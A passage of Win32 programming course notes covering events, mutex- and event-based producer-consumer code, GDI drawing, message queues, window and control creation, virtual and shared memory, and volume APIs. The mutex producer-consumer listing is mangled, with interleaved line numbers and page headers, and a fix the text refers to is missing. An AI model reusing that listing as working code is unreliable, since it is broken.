    CloseHandle(hThread[0]);
    CloseHandle(hThread[1]);
    // an event is a kernel object too, so its handle must be closed
    CloseHandle(e_event);

    return 0;
}
If we change the event-creation parameter to the exclusive (auto-reset) type and run again, the difference between exclusion and notification shows immediately:
So how is the notification type implemented? It comes down to WaitForSingleObject. The MSDN Library description states clearly at the end that the function can modify the kernel object's state. The principle is simple: when the event is a notification (manual-reset) type, the function does not modify the object's state. Think of that state as "occupied": when WaitForSingleObject finds the object unoccupied, it marks it occupied and continues, and other threads that want to use it must wait. That is the concept of mutual exclusion.
13.2 Thread Synchronization
Thread mutual exclusion is the exclusive access of individual threads to shared process resources: when several threads all want a shared resource, at most one may use it at any moment, and the others must wait until the occupier releases it.
Thread synchronization is a constraint relationship between threads: one thread's execution depends on a message from another; while the message has not arrived it waits, and it is woken when the message arrives. The precondition for synchronization is mutual exclusion, plus ordering: exclusion alone does not guarantee that after thread A accesses the critical resource it will be B's turn — it might be A again, which is unordered. So synchronization = mutual exclusion + ordering.
13.2.1 Producer and Consumer
To demonstrate the essential difference between events and mutexes, we can use the producer-consumer model. What does this model mean?
The producer-consumer pattern uses a container to decouple the producer from the consumer. The two do not communicate directly; they communicate through a blocking queue: the producer does not wait for the consumer after producing data but drops it into the queue, and the consumer does not ask the producer for data but takes it from the queue. The blocking queue acts as a buffer that balances the processing capacity of producer and consumer.
In short, the producer makes an item and puts it into the container, then the consumer takes the item out and consumes it, and so on, step by step...
Mutex
First, a producer-consumer implementation using a mutex:
#include "stdafx.h"
1
#include <windows.h>
2
3
// 容器
4
int container;
5
6
// 次数
7
int count = 10;
8
9
// 互斥体
10
HANDLE hMutex;
11
12
// 生产者
13
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
14
for (int i = 0; i < count; i++) {
15
// 等待互斥体,获取令牌
16
WaitForSingleObject(hMutex, INFINITE);
17
// 获取当前进程ID
18
int threadId = GetCurrentThreadId();
19
// 生产存放进容器
20
container = 1;
21
printf("Thread: %d, Build: %d \n", threadId, container);
22
// 释放令牌
23
ReleaseMutex(hMutex);
24
}
25
return 0;
26
}
27
28
// 消费者
29
DWORD WINAPI ThreadProcB(LPVOID lpParameter) {
30
for (int i = 0; i < count; i++) {
31
// 等待互斥体,获取令牌
32
WaitForSingleObject(hMutex, INFINITE);
33
// 获取当前进程ID
34
int threadId = GetCurrentThreadId();
35
printf("Thread: %d, Consume: %d \n", threadId, container);
36
// 消费
37
container = 0;
38
// 释放令牌
39
ReleaseMutex(hMutex);
40
}
41
return 0;
42
}
43
44
int main(int argc, char* argv[])
45
{
46
// 创建互斥体
47
hMutex = CreateMutex(NULL, FALSE, NULL);
48
49
// 创建2个线程
50
HANDLE hThread[2];
51
hThread[0] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
52
hThread[1] = CreateThread(NULL, NULL, ThreadProcB, NULL, 0, NULL);
53
54
WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
55
滴水逆向课程笔记 – Win32
事件 – 57
运行结果如下图所示:
我们可以清晰的看见结果并不是我们想要的,生产一次消费一次的有序进行,甚至还出现了先消费后生产的情
况,这个问题我们可以去修改代码解决:
CloseHandle(hThread[0]);
56
CloseHandle(hThread[1]);
57
CloseHandle(hMutex);
58
59
return 0;
60
}
61
滴水逆向课程笔记 – Win32
事件 – 58
That seems to fix the problem, but it creates another: the for loops now execute far more than 10 times, which wastes CPU time.
Event
Using events solves this requirement much more cleanly:
#include <windows.h>
#include <stdio.h>

// container
int container = 0;

// number of rounds
int count = 10;

// events
HANDLE eventA;
HANDLE eventB;

// producer
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    for (int i = 0; i < count; i++) {
        // wait for event A (a successful wait resets it, since it is auto-reset)
        WaitForSingleObject(eventA, INFINITE);
        // get the current thread ID
        int threadId = GetCurrentThreadId();
        // produce into the container
        container = 1;
        printf("Thread: %d, Build: %d \n", threadId, container);
        // signal event B
        SetEvent(eventB);
    }
    return 0;
}

// consumer
DWORD WINAPI ThreadProcB(LPVOID lpParameter) {
    for (int i = 0; i < count; i++) {
        // wait for event B
        WaitForSingleObject(eventB, INFINITE);
        // get the current thread ID
        int threadId = GetCurrentThreadId();
        printf("Thread: %d, Consume: %d \n", threadId, container);
        // consume
        container = 0;
        // signal event A
        SetEvent(eventA);
    }
    return 0;
}

int main(int argc, char* argv[])
{
    // create the events
    // the precondition for synchronization is mutual exclusion
    // production comes first, so event A starts signaled and event B is signaled by the producer
    eventA = CreateEvent(NULL, FALSE, TRUE, NULL);
    eventB = CreateEvent(NULL, FALSE, FALSE, NULL);

    // create 2 threads
    HANDLE hThread[2];
    hThread[0] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
    hThread[1] = CreateThread(NULL, NULL, ThreadProcB, NULL, 0, NULL);

    WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
    CloseHandle(hThread[0]);
    CloseHandle(hThread[1]);
    // events are kernel objects too, so close their handles
    CloseHandle(eventA);
    CloseHandle(eventB);

    return 0;
}
The result is shown below:
14 The Essence of a Window
The programs we wrote so far were console-based; from this chapter on we study the graphical interface.
The process and thread functions we studied earlier come from kernel32.dll → ntoskrnl.exe; the graphical-interface APIs we are about to study come from user32.dll and gdi32.dll → win32k.sys.
What is the difference between user32.dll and gdi32.dll? Use the former if you want the widgets Windows has already drawn — we call that GUI programming. Use the latter if you want to draw something yourself, say a flower; that involves drawing, and we call it GDI programming.
The HANDLE handles we met earlier are all process-private. The graphical world introduces a new handle, HWND: win32k.sys creates the graphical objects in the kernel, and to use them from user mode we need the corresponding HWND. This handle table is global, and there is only one.
14.1 GDI - Graphics Device Interface
GDI stands for Graphics Device Interface.
This chapter is mainly about GDI programming. We do not need it in daily work and it has little practical use (ready-made components exist for whatever you need); we learn it to understand the essence of windows and of the message mechanism.
GDI involves a few concepts:
1. Device object: where you draw
2. DC (Device Context): the device context object (memory)
3. Image (graphics) objects: determine the properties of what you draw
14.2 A Simple Drawing
The following code draws on the desktop. The meaning of the code is in the comments; anything unclear can be looked up in the MSDN Library:
#include <windows.h>

int main(int argc, char* argv[])
{
    HWND hWnd; // window handle
    HDC hDc;   // device context object
    HPEN hPen; // pen
    // 1. device object: where to draw
    // NULL means draw on the desktop
    hWnd = (HWND)NULL;

    // 2. get the device context (DC)
    /*
        HDC GetDC(
            HWND hWnd // handle to window
        );
    */
    hDc = GetDC(hWnd);

    // 3. create a pen and set the line properties
    /*
        HPEN CreatePen(
            int fnPenStyle,  // pen style
            int nWidth,      // pen width
            COLORREF crColor // pen color
        );
    */
    hPen = CreatePen(PS_SOLID, 5, RGB(0xFF,00,00)); // RGB = red, green, blue; combinations give new colors

    // 4. associate the pen with the DC
    /*
        HGDIOBJ SelectObject(
            HDC hdc,        // handle to DC
            HGDIOBJ hgdiobj // handle to object
        );
    */
    SelectObject(hDc, hPen);

    // 5. draw the line
    /*
        BOOL LineTo(
            HDC hdc,   // device context handle
            int nXEnd, // x-coordinate of ending point
            int nYEnd  // y-coordinate of ending point
        );
    */
    LineTo(hDc, 400, 400);

    // 6. release resources
    DeleteObject(hPen);
    ReleaseDC(hWnd, hDc);

    return 0;
}
15 The Message Queue
15.1 What Is a Message
When we click the mouse or press a key, the operating system records the action and stores it in a structure; that structure is a message.
15.2 The Message Queue
Each thread has exactly one message queue.
15.3 Windows and Threads
When we click a window's close button, why does it close? The OS packs the click (coordinates, which button, ...) into a structure (a message). How is that message delivered precisely to the right process's thread?
The OS can use the coordinates as an index to find the corresponding window. In the kernel each window has a window object, and that object contains a member that is a pointer to a thread object; the thread in turn holds the message queue, so the chain is easy to follow.
Note: one thread can own multiple windows, but a window belongs to exactly one thread.
16 The First Windows Program
16.1 Creating a Windows GUI Project
In VC6 create a new project, choose Win32 Application, and on the next page choose a simple Win32 program.
A console program starts executing at Main; a Win32 GUI program starts at WinMain.
The new project's headers already include the Windows.h header we need.
16.2 The WinMain Function
WinMain is the entry point of a Win32 GUI program, so we need to understand its parameters. Its signature is:
int WINAPI WinMain(
    HINSTANCE hInstance,     // handle to current instance
    HINSTANCE hPrevInstance, // handle to previous instance
    LPSTR lpCmdLine,         // command line
    int nCmdShow             // show state
);
Parameters:
1. HINSTANCE hInstance: a handle (in Win32, names starting with H are usually handles). HINSTANCE is the module's handle; in fact this value is the module's base address in the process's address space.
2. HINSTANCE hPrevInstance: always NULL; no need to dwell on it.
3. The third and fourth parameters (LPSTR lpCmdLine, int nCmdShow) are passed through from CreateProcess's LPTSTR lpCommandLine and LPSTARTUPINFO lpStartupInfo parameters.
16.3 Debug Output
In a GUI program we can no longer print with printf; instead we can use OutputDebugString, whose signature is:
void OutputDebugString(
    LPCTSTR lpOutputString
);
The parameter is an LPCTSTR (a string). Note that this function only prints a fixed string, not a formatted one, so for formatted output first format with sprintf (look it up yourself). Here we try printing the current module handle:
#include "stdafx.h"
#include <stdio.h>

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpCmdLine,
                     int nCmdShow)
{
    // TODO: Place code here.
    DWORD dwAddr = (DWORD)hInstance;

    char szOutBuff[0x80];
    sprintf(szOutBuff, "hInstance address: %x \n", dwAddr); // sprintf requires the stdio.h header
    OutputDebugString(szOutBuff);

    return 0;
}
Running this code prints the string in the Debug output pane; it is a memory address:
16.4 Creating the Window
The following code creates a simple window program:
// Windows.cpp : Defines the entry point for the application.
//

#include "stdafx.h"
#include <stdio.h>

// window procedure
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
    // a default message handler must be called; close, minimize and maximize are all handled by it
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpCmdLine,
                     int nCmdShow)
{
    char szOutBuff[0x80];

    // 1. define the window to create (register the window class)
    TCHAR className[] = TEXT("My First Window");
    WNDCLASS wndClass = {0};
    // set the window background color
    wndClass.hbrBackground = (HBRUSH)COLOR_BACKGROUND;
    // set the class name
    wndClass.lpszClassName = className;
    // set the module base
    wndClass.hInstance = hInstance;
    // the window procedure that handles messages
    wndClass.lpfnWndProc = WindowProc; // not a call: it tells the OS which callback belongs to this window
    // register the window class
    RegisterClass(&wndClass);

    // 2. create and show the window
    /*
        CreateWindow:
        HWND CreateWindow(
            LPCTSTR lpClassName,  // registered class name
            LPCTSTR lpWindowName, // window name
            DWORD dwStyle,        // window style: the window's appearance
            int x,                // horizontal position relative to the parent window
            int y,                // vertical position relative to the parent window
            int nWidth,           // window width in pixels
            int nHeight,          // window height in pixels
            HWND hWndParent,      // handle to parent or owner window
            HMENU hMenu,          // menu handle or child identifier
            HINSTANCE hInstance,  // handle to application instance: the module
            LPVOID lpParam        // window-creation data
        );
    */
    HWND hWnd = CreateWindow(className, TEXT("Window"), WS_OVERLAPPEDWINDOW, 10, 10, 600, 300, NULL, NULL, hInstance, NULL);

    if (hWnd == NULL) {
        // NULL means window creation failed: print the error
        sprintf(szOutBuff, "Error: %d", GetLastError());
        OutputDebugString(szOutBuff);
        return 0;
    }

    // show the window
    /*
        ShowWindow:
        BOOL ShowWindow(
            HWND hWnd,   // handle to window
            int nCmdShow // show state
        );
    */
    ShowWindow(hWnd, SW_SHOW);

    // 3. receive and process messages
    /*
        GetMessage:
        BOOL GetMessage(
            LPMSG lpMsg,        // message information, OUT parameter (a pointer)
            // the last three parameters are filters
            HWND hWnd,          // window handle; NULL means all messages of this thread
            UINT wMsgFilterMin, // first message
            UINT wMsgFilterMax  // last message
        );
    */
    MSG msg;
    BOOL bRet;
    while( (bRet = GetMessage( &msg, NULL, 0, 0 )) != 0)
    {
        if (bRet == -1)
        {
            // handle the error and possibly exit
            sprintf(szOutBuff, "Error: %d", GetLastError());
            OutputDebugString(szOutBuff);
            return 0;
        }
        else
        {
            // translate the message
            TranslateMessage(&msg);
            // dispatch the message: let the system call the window procedure
            DispatchMessage(&msg);
        }
    }

    return 0;
}
The figure below shows the execution flow of window creation:
17 Message Types
17.1 How Messages Are Produced and Processed
Starting from where a message originates: suppose we click some window; a message is produced. The OS determines which window was clicked, finds the corresponding window object, and from one of its members finds the owning thread. Once the thread is found, the OS stores the packaged message (a structure containing the click coordinates and so on) in that thread's message queue, and the application keeps pulling messages out of the queue with GetMessage.
17.2 The Message Structure
We receive messages through GetMessage, whose first parameter is the received message (a structure). In the earlier code we can select MSG and press F12 to see its definition:
typedef struct tagMSG {
    HWND hwnd;     // handle of the owning window
    UINT message;  // message type: a number
    WPARAM wParam; // extra data describing the message further
    LPARAM lParam; // extra data describing the message further
    DWORD time;    // when the message was produced
    POINT pt;      // where it was produced
} MSG, *PMSG;
Messages can be produced in four situations: 1. the keyboard, 2. the mouse, 3. another application, 4. the OS kernel. With so many messages to handle, the OS classifies them, and every message has a unique number.
The structure stores little: it only tells you which window a message belongs to, not which window procedure handles it, so we must dispatch the message afterwards (DispatchMessage) and the kernel then invokes the window procedure.
In other words, the message structure is effectively handed to the window procedure: its four parameters correspond to the structure's first four members.
17.3 Message Types
To focus on the message types we care about, we can first print the message types in the window procedure and see what arrives:
// window procedure
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
    char szOutBuff[0x80];
    sprintf(szOutBuff, "Message: %x - %x \n", hwnd, uMsg);
    OutputDebugString(szOutBuff);

    // a default message handler must be called; close, minimize and maximize are all handled by it
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
This prints, for example, 0x1. To find what it means, open WINUSER.H in C:\Program Files\Microsoft Visual Studio\VC98\Include and search for 0x0001:
The corresponding macro is WM_CREATE, meaning the window was created. So there are many messages we do not need to care about, and messages are produced constantly, in huge numbers.
17.3.1 Handling Window Close
When the window is closed the process does not actually exit, so we filter in the window procedure and quit the process once the window is destroyed:
// window procedure
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
    switch(uMsg) {
        // quit the process when the window is destroyed
        case WM_DESTROY:
        {
            PostQuitMessage(0);
            break;
        }
    }

    // a default message handler must be called; close, minimize and maximize are all handled by it
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
17.3.2 Handling Key Presses
Besides window close we can also handle key presses; the key-down macro is WM_KEYDOWN. But what if we want to react only after the 'a' key is pressed? First consult the MSDN Library:
LRESULT CALLBACK WindowProc(
    HWND hwnd,     // handle to window
    UINT uMsg,     // WM_KEYDOWN
    WPARAM wParam, // virtual-key code
    LPARAM lParam  // key data
);
Clearly the window procedure's third parameter is the virtual-key code (every key on the keyboard has one). Let's print the virtual-key code produced by pressing 'a':
// window procedure
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
    switch(uMsg) {
        // handle key down
        case WM_KEYDOWN:
        {
            char szOutBuff[0x80];
            sprintf(szOutBuff, "keycode: %x \n", wParam);
            OutputDebugString(szOutBuff);
            break;
        }
    }

    // a default message handler must be called; close, minimize and maximize are all handled by it
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
As the figure above shows, pressing 'a' prints virtual-key code 0x41, so we can test against that value.
17.4 Translating Messages
We handled key-down messages above, but what if we want to see what was actually typed rather than a virtual-key code? That is what the WM_CHAR macro is for. Before that, the message must be translated: only after translation does the virtual-key code become a concrete character.
For WM_CHAR, the window procedure's parameters mean:
LRESULT CALLBACK WindowProc(
    HWND hwnd,     // handle to window
    UINT uMsg,     // WM_CHAR
    WPARAM wParam, // character code (TCHAR)
    LPARAM lParam  // key data
);
The third parameter is the character, so we can print it directly, as sketched below:
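A minimal sketch of such a WM_CHAR handler (my own illustration, reusing this chapter's WindowProc skeleton; remember the message loop must call TranslateMessage or WM_CHAR is never generated):
// assumes <windows.h> and <stdio.h> are included as in the earlier listings
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
    switch (uMsg) {
        case WM_CHAR:
        {
            char szOutBuff[0x80];
            sprintf(szOutBuff, "char: %c \n", wParam); // wParam is the translated character
            OutputDebugString(szOutBuff);
            break;
        }
    }
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}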
18 Child Window Controls
18.1 About Child Window Controls
1. Windows provides several predefined window classes for our convenience; we usually call them child window controls, or controls for short.
2. A control handles its own messages and notifies its parent window when its state changes.
3. Predefined controls include buttons, checkboxes, edit boxes, static text labels, scroll bars, and so on.
18.2 Creating an Edit Box and Buttons
Child window controls can be created with CreateWindow; a good place is the window procedure, creating the controls when the window itself is created.
// Windows.cpp : Defines the entry point for the application.
//

#include "stdafx.h"
#include <stdio.h>

// child-window control identifiers
#define CWA_EDIT     0x100
#define CWA_BUTTON_0 0x101
#define CWA_BUTTON_1 0x102

// global module handle
HINSTANCE gHinstance;


// window procedure
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
    switch (uMsg) {
        // handle typed characters
        case WM_CHAR:
        {
            char szOutBuff[0x80];
            sprintf(szOutBuff, "keycode: %c \n", wParam);
            OutputDebugString(szOutBuff);
            break;
        }
        // when the window is created, create the child controls
        case WM_CREATE:
        {
            // create the edit box
            CreateWindow(
                TEXT("EDIT"),        // registered class name; EDIT gives an edit box
                TEXT(""),            // window name
                WS_CHILD | WS_VISIBLE | WS_VSCROLL | ES_MULTILINE, // style: child window, visible, scroll bar, multi-line
                0,                   // x position in the parent window
                0,                   // y position in the parent window
                400,                 // control width
                300,                 // control height
                hwnd,                // parent window handle
                (HMENU)CWA_EDIT,     // child identifier
                gHinstance,          // module
                NULL                 // window-creation data
            );

            // create the "Set" button
            CreateWindow(
                TEXT("BUTTON"),      // registered class name; BUTTON gives a button
                TEXT("Set"),         // button caption
                WS_CHILD | WS_VISIBLE, // style: child window, visible
                450,                 // x position in the parent window
                150,                 // y position in the parent window
                80,                  // control width
                20,                  // control height
                hwnd,                // parent window handle
                (HMENU)CWA_BUTTON_0, // child identifier
                gHinstance,          // module
                NULL                 // window-creation data
            );

            // create the "Get" button
            CreateWindow(
                TEXT("BUTTON"),      // registered class name; BUTTON gives a button
                TEXT("Get"),         // button caption
                WS_CHILD | WS_VISIBLE, // style: child window, visible
                450,                 // x position in the parent window
                100,                 // y position in the parent window
                80,                  // control width
                20,                  // control height
                hwnd,                // parent window handle
                (HMENU)CWA_BUTTON_1, // child identifier
                gHinstance,          // module
                NULL                 // window-creation data
            );

            break;
        }
        // handle button clicks
        case WM_COMMAND:
        {
            // for WM_COMMAND the low 16 bits of wParam hold the control identifier;
            // LOWORD() extracts them so we can tell the buttons and edit box apart
            switch (LOWORD(wParam)) {
                // the "Set" button
                case CWA_BUTTON_0:
                {
                    // SetDlgItemText changes the edit box content
                    SetDlgItemText(hwnd, (int)CWA_EDIT, TEXT("HACK THE WORLD"));
                    break;
                }
                // the "Get" button
                case CWA_BUTTON_1:
                {
                    // show the edit box content in a message box
                    TCHAR szEditBuffer[0x80];
                    GetDlgItemText(hwnd, (int)CWA_EDIT, szEditBuffer, 0x80);
                    MessageBox(NULL, szEditBuffer, NULL, NULL);
                    break;
                }
            }
            break;
        }
    }

    // a default message handler must be called; close, minimize and maximize are all handled by it
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpCmdLine,
                     int nCmdShow)
{
    char szOutBuff[0x80];

    // 1. define the window to create (register the window class)
    TCHAR className[] = TEXT("My First Window");
    WNDCLASS wndClass = {0};
    // set the window background color
    wndClass.hbrBackground = (HBRUSH)COLOR_BACKGROUND;
    // set the class name
    wndClass.lpszClassName = className;
    // set the module base
    gHinstance = hInstance;
    wndClass.hInstance = hInstance;
    // the window procedure that handles messages
    wndClass.lpfnWndProc = WindowProc;
    // register the window class
    RegisterClass(&wndClass);

    // 2. create and show the window
    HWND hWnd = CreateWindow(className, TEXT("Window"), WS_OVERLAPPEDWINDOW, 10, 10, 600, 300, NULL, NULL, hInstance, NULL);

    if (hWnd == NULL) {
        // NULL means window creation failed: print the error
        sprintf(szOutBuff, "Error: %d", GetLastError());
        OutputDebugString(szOutBuff);
        return 0;
    }

    // show the window
    ShowWindow(hWnd, SW_SHOW);

    // 3. receive and process messages
    MSG msg;
    BOOL bRet;
    while( (bRet = GetMessage( &msg, NULL, 0, 0 )) != 0)
    {
        if (bRet == -1)
        {
            // handle the error and possibly exit
            sprintf(szOutBuff, "Error: %d", GetLastError());
            OutputDebugString(szOutBuff);
            return 0;
        }
        else
        {
            // translate the message
            TranslateMessage(&msg);
            // dispatch the message: let the system call the window procedure
            DispatchMessage(&msg);
        }
    }

    return 0;
}
The result looks like this:
Windows' predefined window classes are listed in the MSDN Library under the CreateWindow function.
19 Virtual Memory and Physical Memory
19.1 The Relationship Between Virtual and Physical Memory
Every process has its own 4GB of memory, but this 4GB does not really exist; it is virtual memory.
Storing a value at address 0x12345678 in process A and storing another value at 0x12345678 in process B does not conflict; each keeps its own.
The values themselves live in physical memory, so there is a mapping between virtual and physical memory: physical memory is allocated only when you actually use an address; otherwise you hold only virtual memory (an IOU).
Physical memory is divided into pages (Page) of 4KB each, hence the concept of a physical page shown in the figure.
19.2 How Virtual Addresses Are Divided
Each process has 4GB of virtual memory. How are the addresses divided? First, virtual memory splits into a high 2GB and a low 2GB.
As the figure below shows, user space is the low 2GB and kernel space is the high 2GB. We can only use the low 2GB; the high 2GB of kernel space is shared by all processes.
Note that within the low 2GB, the first 64KB (the null-pointer assignment region) and the last 64KB (the no-access region) cannot currently be used by us.
Terminology: a linear address is a virtual-memory address.
In particular: there are 4GB of linear addresses, but not all of them are accessible, so the system must record which regions have been allocated.
19.3 Physical Memory
19.3.1 Usable Physical Memory
For ease of management, physical memory is paged at 4KB. How many physical pages does a system have? My virtual machine lets me set the memory size (physically, think of it as the RAM stick):
For example mine is 2GB (2048MB); the task manager clearly shows total physical memory close to 2048*1024 KB:
How many physical pages does that give? Divide the total by 4:
That is 524138 physical pages (decimal), which is 0x7FF6A in hex.
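A quick arithmetic check on that figure: 0x7FF6A = 524138, and
524138 pages × 4 KB/page = 2,096,552 KB ≈ 2047.4 MB
which is just under the configured 2048 MB; the small shortfall would be memory the system reserves for itself (an assumption on my part — the exact amount varies by machine).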
What if these physical pages are not enough? The OS then uses disk space as backing storage. We can view and change the current paging-file size in the system properties:
The current initial size is 2046MB. Where is it stored? Look at pagefile.sys in the root of drive C (you must show hidden system files); it is exactly 2046MB, and this file is what backs the paged-out memory:
19.3.2 Recognizable Physical Memory
A 32-bit OS can recognize at most 64GB of physical memory, but the OS imposes limits; XP, for instance, only recognizes 4GB (Windows Server 2003 server editions can recognize more than 4GB).
We can, however, hook system functions to break XP's 4GB limit.
19.4 How Physical Pages Are Used
A process gets physical pages when it uses virtual memory, but with so many programs the pages would quickly fill up. The OS is not designed that naively: it watches whether your program uses its pages frequently; if not, it moves a page's contents into pagefile.sys and hands the page to another process that needs it.
If your program touches that page again, it is given a new physical page and the data is brought back from pagefile.sys. The OS does all of this; a program never notices these details.
20 Allocating and Freeing Private Memory
Physical memory falls into two classes: private memory (Private) and shared memory (Mapped). Private means the physical pages are used only by you; shared means several processes use them together.
20.1 Two Ways to Obtain Memory
1. Private memory is allocated with VirtualAlloc/VirtualAllocEx. Their underlying implementation is identical, but the latter can allocate memory inside another process.
2. Shared memory is mapped with CreateFileMapping.
20.2 Allocating and Freeing
The allocation function is VirtualAlloc. Its signature is:
LPVOID VirtualAlloc(
    LPVOID lpAddress,       // region to reserve or commit: the address to allocate at; usually left unspecified
    SIZE_T dwSize,          // size of region: one physical page is 0x1000 (4KB); multiply by the number of pages needed
    DWORD flAllocationType, // type of allocation: commonly MEM_COMMIT (take linear addresses and physical memory) or MEM_RESERVE (take linear addresses only)
    DWORD flProtect         // type of access protection: the memory's initial protection
);
The values allowed for the third and fourth parameters are defined by the system; see the MSDN Library.
The following allocates 2 physical pages, taking linear addresses and physical memory, readable and writable:
LPVOID pm = VirtualAlloc(NULL, 0x1000*2, MEM_COMMIT, PAGE_READWRITE);
Once we no longer want the memory we must release it; the free function is VirtualFree, whose signature is:
BOOL VirtualFree(
    LPVOID lpAddress, // address of region
    SIZE_T dwSize,    // size of region
    DWORD dwFreeType  // operation type: MEM_DECOMMIT (free the physical memory, keep the linear addresses) or MEM_RELEASE (free both; dwSize must then be 0)
);
So to free both the physical memory and the linear addresses we write:
VirtualFree(pm, 0, MEM_RELEASE);
20.3 Heap and Stack
What kind of memory do the malloc or new we learned earlier give us? Allocation through them is a pseudo-allocation: they hand out pieces of memory that has already been allocated. Memory obtained through them is called heap memory; local variables live in stack memory.
Both heap and stack are allocated for us with VirtualAlloc when the process starts, so the essence of heap and stack is private memory obtained through VirtualAlloc.
int main(int argc, char* argv[])
{
    int x = 0x12345678; // stack

    int* y = (int*)malloc(sizeof(int)*128); // heap

    return 0;
}
21 Allocating and Freeing Shared Memory
21.1 Shared Memory
Shared memory is mapped with CreateFileMapping, whose signature is:
HANDLE CreateFileMapping( // a kernel object that prepares physical memory and can also map a file onto physical pages
    HANDLE hFile,                       // handle to file; pass INVALID_HANDLE_VALUE if you don't want to map a file onto the pages
    LPSECURITY_ATTRIBUTES lpAttributes, // security attributes, contains the security descriptor
    DWORD flProtect,                    // protection: attributes of the physical pages
    DWORD dwMaximumSizeHigh,            // high-order DWORD of size; usually 0 on 32-bit machines
    DWORD dwMaximumSizeLow,             // low-order DWORD of size: the size of the physical memory
    LPCTSTR lpName                      // object name: set it when sharing, optional for private use
);
This function prepares the physical pages, but creating them does not yet make them usable: we still have to map the pages to linear addresses with MapViewOfFile, whose signature is:
LPVOID MapViewOfFile(
    HANDLE hFileMappingObject,  // handle to the file-mapping object
    DWORD dwDesiredAccess,      // access mode (the virtual-memory protection must be at least as strict as the physical pages')
    DWORD dwFileOffsetHigh,     // high-order DWORD of offset; usually 0 on 32-bit machines
    DWORD dwFileOffsetLow,      // low-order DWORD of offset: where the mapping starts
    SIZE_T dwNumberOfBytesToMap // number of bytes to map; usually the physical page size
);
Example code:
#include <windows.h>

#define MapFileName "SharedMemory"
#define BUF_SIZE 0x1000
HANDLE g_hMapFile;
LPTSTR g_lpBuff;

int main(int argc, char* argv[])
{
    // kernel object: prepare the physical page; INVALID_HANDLE_VALUE (-1), read/write pages, one page
    g_hMapFile = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, BUF_SIZE, MapFileName);
    // map the physical page to linear addresses
    g_lpBuff = (LPTSTR)MapViewOfFile(g_hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, BUF_SIZE);

    // store into the physical memory
    *(PDWORD)g_lpBuff = 0x12345678;

    // unmap: releases the linear addresses, but the physical page still exists
    UnmapViewOfFile(g_lpBuff);
    // close the handle; the physical page is freed only once no one uses it any more —
    // this just tells the system our process no longer uses the handle (page)
    CloseHandle(g_hMapFile);
    return 0;
}
22 The File System
A file system is the set of methods and data structures an OS uses to manage files on disk; simply put, how files are organized on the disk.
Windows has the NTFS and FAT32 file systems; you can check by viewing a local disk's properties:
22.1 Volume APIs
A volume can be understood as a local disk (logical drive); we can split one 2GB disk into two volumes, and inside a volume live files and directories.
22.1.1 Getting the Volumes (Logical Drives)
GetLogicalDrives retrieves all logical drives on the current machine. Its signature is:
DWORD GetLogicalDrives(VOID); // returns a DWORD, no parameters
The code below ends up retrieving the hex value d; the MSDN Library states clearly what the return value means:
// get the volumes (logical drives)
DWORD gLd = GetLogicalDrives();
printf("GetLogicalDrives: %x", gLd);
The bits indicate which drives exist: bit 0 set means drive A exists, bit 1 means drive B, and so on. Here we got 0xd, binary 1101: bit 0 is 1, bit 1 is 0, bits 2 and 3 are 1, so drives A, C and D exist.
22.1.2 Getting the Logical Drive Strings
GetLogicalDriveStrings retrieves the strings of all logical drives. Its signature is:
DWORD GetLogicalDriveStrings(
    DWORD nBufferLength, // size of buffer (IN): how many characters to retrieve
    LPTSTR lpBuffer      // drive strings buffer (OUT): receives the strings
);
// get the logical drive strings
DWORD nBufferLength = 100;
char szOutBuffer[100];
GetLogicalDriveStrings(nBufferLength, szOutBuffer);
As shown below, we obtain the strings of all logical drives; clearly a drive string is the drive letter plus a colon and a backslash:
22.1.3 Getting a Volume's (Logical Drive's) Type
GetDriveType retrieves a volume's type. Its signature is:
UINT GetDriveType(
    LPCTSTR lpRootPathName // root directory: a drive string works here
);
// get the volume's type
UINT type;
type = GetDriveType(TEXT("C:\\"));

if (type == DRIVE_UNKNOWN) {
    printf("the drive type cannot be determined \n");
} else if (type == DRIVE_NO_ROOT_DIR) {
    printf("the root path is invalid, e.g. no volume is mounted at it \n");
} else if (type == DRIVE_REMOVABLE) {
    printf("the disk can be removed from the drive \n");
} else if (type == DRIVE_FIXED) {
    printf("the disk cannot be removed from the drive \n");
} else if (type == DRIVE_REMOTE) {
    printf("the drive is a remote (network) drive \n");
} else if (type == DRIVE_CDROM) {
    printf("the drive is a CD-ROM drive \n");
} else if (type == DRIVE_RAMDISK) {
    printf("the drive is a RAM disk \n");
}
As shown below, I retrieved the type of logical drive C:
22.1.4 Getting Volume Information
GetVolumeInformation retrieves information about a volume. Its signature is:
BOOL GetVolumeInformation(
    LPCTSTR lpRootPathName,           // root directory (IN): drive string
    LPTSTR lpVolumeNameBuffer,        // volume name buffer (OUT): receives the volume name
    DWORD nVolumeNameSize,            // length of name buffer (IN)
    LPDWORD lpVolumeSerialNumber,     // volume serial number (OUT)
    LPDWORD lpMaximumComponentLength, // maximum file name length (OUT): longest file-name component the file system supports
    LPDWORD lpFileSystemFlags,        // file system options (OUT): flags of the file system
